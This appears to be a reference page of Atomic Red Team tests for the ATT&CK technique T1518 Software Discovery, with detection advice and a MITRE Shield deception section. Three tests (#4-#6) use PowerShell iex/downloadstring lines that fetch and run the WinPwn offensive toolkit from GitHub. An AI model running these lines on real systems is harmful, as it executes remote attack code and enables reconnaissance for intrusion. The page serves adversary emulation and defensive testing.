T1518 - Software Discovery

Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to Exploitation for Privilege Escalation.

Atomic Tests

Atomic Test #1 - Find and Display Internet Explorer Browser VersionQuery the registry to determine the version of internet explorer installed on the system.

Upon execution, version information about internet explorer will be displayed. Supported Platforms: windows#### Attack Commands: Run with command_prompt

reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" /v svcVersion

Invoke-AtomicTest T1518 -TestNumbers 1

Atomic Test #2 - Applications InstalledQuery the registry to determine software and versions installed on the system. Upon execution a table of

software name and version information will be displayed. Supported Platforms: windows#### Attack Commands: Run with powershell

Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize
Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize

Invoke-AtomicTest T1518 -TestNumbers 2

Atomic Test #3 - Find and Display Safari Browser VersionAdversaries may attempt to get a listing of non-security related software that is installed on the system. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors

Supported Platforms: macos Elevation Required (e.g. root or admin)#### Attack Commands: Run with sh

/usr/libexec/PlistBuddy -c "print :CFBundleShortVersionString" /Applications/Safari.app/Contents/Info.plist
/usr/libexec/PlistBuddy -c "print :CFBundleVersion" /Applications/Safari.app/Contents/Info.plist

Invoke-AtomicTest T1518 -TestNumbers 3

Atomic Test #4 - WinPwn - DotnetsearchSearch for any .NET binary file in a share using the Dotnetsearch function of WinPwnSupported Platforms: windows#### Attack Commands: Run with powershell

$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Dotnetsearch -noninteractive -consoleoutput```

Invoke-AtomicTest T1518 -TestNumbers 4

Atomic Test #5 - WinPwn - DotNetSearch for .NET Service-Binaries on this system via winpwn dotnet function of WinPwn.Supported Platforms: windows#### Attack Commands: Run with powershell

$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
dotnet -consoleoutput -noninteractive```

Invoke-AtomicTest T1518 -TestNumbers 5

Atomic Test #6 - WinPwn - powerSQLStart PowerUpSQL Checks using powerSQL function of WinPwnSupported Platforms: windows#### Attack Commands: Run with powershell

$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powerSQL -noninteractive -consoleoutput```

Invoke-AtomicTest T1518 -TestNumbers 6

Detection

System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained.

Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.

Shield Active Defense

Application Diversity

Present the adversary with a variety of installed applications and services.

Application diversity is presenting multiple software targets to the adversary. On a single target system, defenders can configure multiple different services or user software applications. On a target network, defenders can present systems with a variety of operating systems, operating system versions, applications, and services.

Opportunity

There is an opportunity to provide a variety of applications to an adversary to see what things an adversary prefers or to influence their operations.

Use Case

A defender can install an array of various software packages on a system to make it look used and populated. This will give an adversary a collection of software to interact with and possibly expose additional techniques.

Procedures

Use a mix of vulnerable and nonvulnerable software on a system to allow you to see what exploits the adversary leverages in their attacks. Install Anti-virus or other end-point detection tools on systems to see if an adversary takes note of them and if so, how they react.